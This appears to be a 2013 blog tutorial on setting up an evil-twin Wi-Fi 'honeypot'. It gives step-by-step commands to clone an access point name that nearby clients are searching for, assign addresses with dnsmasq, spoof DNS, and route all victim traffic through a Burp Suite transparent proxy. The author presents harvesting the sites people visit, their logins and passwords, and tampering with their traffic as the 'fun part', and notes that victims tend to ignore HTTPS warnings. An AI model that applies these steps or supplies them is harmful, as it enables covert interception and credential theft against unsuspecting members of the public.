--[ MITM WiFi Honeypot ]

we will create a fake wifi hotspot so that clients may connect to it and we can see what they are up to. And log everything they browse to on the hotspot.
You will act as a wifi hotspot, providing internet. You are able to monitor those who connect to it and forward them to the real server, acting as a man-in-the-middle. You can intercept about every data or append it to your needs to forward that to the real server.
[CLIENT] <-------------> [ YOU ] <------------> [INTERNET]





What do you need?
  1. Linux OS; Kali
  2. Wifi Adapter that supports hosted network
  3. Internet
If you have Kali Linux or even Backtrack or any distribution which has aircrack-ng  suite of tools then you are good .. Else you need to install it from here - http://www.aircrack-ng.org/ or you can start your terminal / console and type

apt-get update
apt-get install aircrack-ng 

NOTE: even kali and backtrack users I suggest you use dnsmasq [instead of dhcpserver3 or dhcpd ]and install it once again even if its already installed.

Next you need to have dnsmasq to get it type

apt-get install dnsmasq
Now you are ready .. Lets start ..

Setting Up

First we need to gather some information ..plug in your usb wifi adapter if you have one and in terminal / console type 

ifconfig

You should see something like this on your screen
   
There you will see wlan0 or even wlan1 [If you have extra wifi adapter ] . Take a note of what you have and then type
  
airmon-ng start wlan0
or
airmon-ng start wlan1

depending on what you have You should be able to  see (monitor mode enabled on mon0) 

Now thats done .. lets proceed .. 
Next we need to monitor the airwaves to get the names of the wifi access point the clients are trying to connect to do that type 

airodumpn-ng mon0

You should be able to see a few clients and under probe you will find the name of the Access Point the client is trying to connect to in this example we see that the client is searching for the wifi access point named achutetech

So we will create a Fake Ap with the name of achutetech and try to make the client connect to us . To do this we type ..
 

airbase-ng --essid achutetech mon0

In our example we see this 

That we have successfully managed to create a fake AP and a client with an client also was successfully associated with our fake AP. But the client will still not be fully connected to our AP since we haven't provided it with any IP address  . To do so we use dnsmasq

Note :  I have tried using dhcpd or dnsserver3 but they seem to be error prone while configuring them  and it was getting errors like Interface name is too long and all so I switched to dnsmasq and it seems to work great :D
  
To verify that we have dnsmasq type
 

whereis dnsmasq

and to see whether we have the configuration file or not [I have noticed that even tough dnsmasq was installed on Kali Os it didnt have the dnsmasq.conf file so to get it type apt-get install dnsmasq ]

and to verify that we have the config file type

ls /etc/ | grep dnsmasq

if dnsmasq.conf file is returned then its well and good But if not try

apt-get install dnsmasq

Ok now we have the dnsmasq we need to configure a few things type

vim /etc/dnsmasq.conf

[How to use vim - I will be writing a quick tutorial on it soon ]
now scroll down to line 90 or around you should see

# interface=

change it to

interface=at0

// at0 is the interface in which our FAKE AP lies

now scroll down even more to line 141 you  should see

#dhcp-range=192.168.0.50,192.168.0.150,12h

just remove the #

and you are good to go :D

Now we have to supply an ip address to your router [i.e the fake ap ]

to do so type

ifconfig at0 192.168.0.1 up

and to start the dhcp service type

dnsmasq

Now your clients should be able to get an ip address for themselves.


Ok.. so we have created the Fake AP , our client is connected to us and we have supplied them with our dhcp pool of address .. With this all done lets begin the FUN part..

What we will be doing ?

We will be doing dns spoofing that is we will forward all our client's request to our own computer so that we can monitor the request and even modify them if we want to and get all those details like the sites visited , sites user name and password ..and even modify those request and response .. sounds lot of fun lets get going ..

DNS spoofing 

to do dns spoofing type

dnsspoof -i at0

what we are doing is that we are forwarding all the dns request of our client to our own ip address ..  we should be able to see something like this



now thats done we have dns spoofing running and every client request is being forwarded to our own ip address now we will bind a proxy to our ip address so that we can intercept and create a transparent proxy so that the client may be able to connect to the Internet.

Note : we must be connected to the Internet for the client to be able to connect to the Internet .

ok lets start burpsuite

Now go to the Proxy Tab and to the Options tab of it click on Add


Type In 80 In the bind to port box
and select your router address or your at0 address in our case it is 192.168.0.1
And click on request handling tab and check the tick box for support Invisible proxying
click on ok and we are done ..

Repeat the same with port no 443 to handle HTTPS requests :P


Now you can see any request the client makes in the intercept tab and you can tamper with it monitor it forward it or even drop it .. You are the BOSS now :D .. you can even get login id and passwords of different site the client uses .. but while using https site the client will get a warning ..which most of the time they ignore :D
(http://www.techgeektricks.blogspot.in/2013/07/mitm-wifi-honeypot.html)